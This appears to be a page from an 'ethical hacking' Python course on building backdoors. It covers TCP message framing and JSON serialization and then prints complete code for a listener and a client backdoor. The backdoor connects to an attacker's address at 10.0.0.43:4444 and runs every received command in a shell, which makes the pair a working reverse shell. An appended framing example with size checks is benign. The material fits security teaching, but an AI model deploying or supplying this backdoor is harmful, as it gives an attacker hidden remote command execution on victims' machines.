  • Python Ethical Hacking

    BACKDOORS Sockets

    Problem:

    • TCP is stream-based.
    • Difficult to identify the end of message/batch.

    Solution:

    • Make sure the message is well defined.
    • Implement a protocol that the send and receive methods conform to.
      • Send the size of the message as a header.
      • Append an end-of-message mark to the end of each message.
      • Serialize the message.

    BACKDOORS Serialization

    Benefits:

    • The message is well defined; the receiver knows if a message is incomplete.
    • Can be used to transfer objects (lists, dicts, etc.).

    Implementation:

    • JSON and Pickle are common solutions.
    • JSON (JavaScript Object Notation) is implemented in many programming languages.
    • Represents objects as text.
    • Widely used when transferring data between clients and servers.

     Server Side - Listener Code:

    #!/usr/bin/env python
    import socket
    import json
    
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command.decode())
            return self.reliable_receive()
    
        def run(self):
            while True:
                command = input(">> ").encode()
                result = self.execute_remotely(command)
                print(result)
    
    
    my_listener = Listener("10.0.0.43", 4444)
    my_listener.run()

    Client Side - Backdoor code:

    #!/usr/bin/env python
    import json
    import socket
    import subprocess
    
    
    class Backdoor:
        def __init__(self, ip, port):
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_system_command(self, command):
            return subprocess.check_output(command, shell=True)
    
        def run(self):
            while True:
                command = self.reliable_receive()
                command_result = self.execute_system_command(command)
                self.reliable_send(command_result.decode())
            self.connection.close()
    
    
    my_backdoor = Backdoor("10.0.0.43", 4444)
    my_backdoor.run()
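
The size-header option from the Solution list, as an added example that is not code from the original page: the page's reliable_receive retries json.loads after every recv, which never succeeds once two messages land in the same buffer and loops forever if the peer closes before a complete message arrives. The 4-byte header layout, the 1 MiB cap and all function names here are assumptions of this example.

```python
import json
import socket
import struct

HEADER = struct.Struct("!I")   # assumed header: 4-byte big-endian body length
MAX_MESSAGE = 1 << 20          # assumed 1 MiB cap on what a peer can make us buffer

def send_msg(sock, obj):
    body = json.dumps(obj).encode("utf-8")
    if len(body) > MAX_MESSAGE:
        raise ValueError("message too large")
    sock.sendall(HEADER.pack(len(body)) + body)   # send() may write only part

def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:   # b"" means the peer closed the connection
            raise ConnectionError("closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)

def recv_msg(sock):
    """Receive one framed message; check the declared size before buffering."""
    (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    if length > MAX_MESSAGE:
        raise ValueError("declared length %d exceeds cap" % length)
    return json.loads(recv_exact(sock, length).decode("utf-8"))

def outcome(sock):
    """Return the decoded message, or the name of the error recv_msg raised."""
    try:
        return recv_msg(sock)
    except (ValueError, ConnectionError) as exc:
        return type(exc).__name__

def demo():
    """Constructed exchange over a local socket pair; nothing leaves the host."""
    a, b = socket.socketpair()
    with a, b:
        send_msg(a, {"id": 1, "items": ["x", "y"]})  # two messages back to back
        send_msg(a, "second message")                # arrive as one byte stream
        results = [outcome(b), outcome(b)]
        a.sendall(HEADER.pack(MAX_MESSAGE + 1))      # header promising too much
        results.append(outcome(b))
        a.sendall(HEADER.pack(10) + b"abc")          # 3 of 10 bytes, then close
        a.shutdown(socket.SHUT_WR)
        results.append(outcome(b))
    return results
```

Calling demo() returns the two decoded messages followed by the error names for the oversized header and the truncated body, so each failure surfaces as an exception instead of a stalled read.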


  • Original article: https://www.cnblogs.com/keepmoving1113/p/11628693.html